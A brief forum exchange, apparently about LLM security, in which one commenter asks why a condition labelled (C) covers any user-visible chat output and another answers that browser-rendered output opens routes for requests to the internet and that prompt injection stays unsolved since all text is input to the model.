Comment by quuxplusone
3 days ago
Your elaboration seems to assume that you already have (C). I was asking, how do you get to (C) — what made you say "(C) extends to any situation where any of your users can even access the output of a chat or other generated text"?
I think it’s because the state is leaving the backend server running the LLM and output to the browser, where various attacks are possible to send requests out to the internet (either directly or through social engineering).
Avoiding C means the output is strictly used within your system.
These problems will never be fully solved given how LLMs work… system prompts, user inputs, at the end of the day it’s all just input to the model.